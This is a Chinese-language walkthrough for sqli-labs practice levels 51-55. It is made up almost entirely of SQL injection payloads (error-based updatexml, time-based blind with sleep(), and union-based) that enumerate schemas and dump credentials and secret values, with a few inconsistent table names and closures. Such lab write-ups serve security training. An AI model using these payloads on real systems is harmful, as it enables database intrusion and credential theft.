sqli-labs靶场通关攻略 51-55

主页有sqli-labs靶场通关攻略 1-50

第五一关 less-51

步骤一：利用报错注入查询库

?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

步骤二：查询表名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) --+

步骤三：查看user表中列名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

步骤四：查询数据

?sort=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1) --+

第五二关 less-52

步骤一：利用时间盲注查询数据库

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

得出数据库长度为'security'

步骤二：查询表名

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)

第一个表名为'email'

第五三关 less-53

步骤一：利用时间盲注查询数据库

?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1) --+

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

得出数据库长度为'security'

步骤二：查询表名

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

?sort=1'and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

第一个表名为'email'

第五四关 less-54

步骤一：闭合方式?id=1' --+

步骤二：查询数据库

?id=-1' union select 1,2,database() --+

步骤三：联合查询 查出网站的数据库表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

t7rdtyr6cn

步骤四：联合查询 查出users表列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='c32n7ncqap' --+

secret_I79E

步骤五：获取目标信息

?id=-1' union select 1,2,secret_I79E from t7rdtyr6cn --+

QeMKsxsGHJWqtpt6ZMXPtoPZ

输入登录框,提交成功

第五五关 less-55

步骤一：闭合方式?id=1) --+

步骤二：查询数据库

?id=-1) union select 1,2,database() --+

步骤三：联合查询 查出网站的数据库表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

qh55e2yvem

步骤四：联合查询 查出users表列名

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qh55e2yvem' --+

secret_CY1J

步骤五：获取目标信息

?id=-1) union select 1,2,secret_CY1J from qh55e2yvem --+

7hf9Kp0W2EFVDpUJvmhZVBsf

输入登录框,提交成功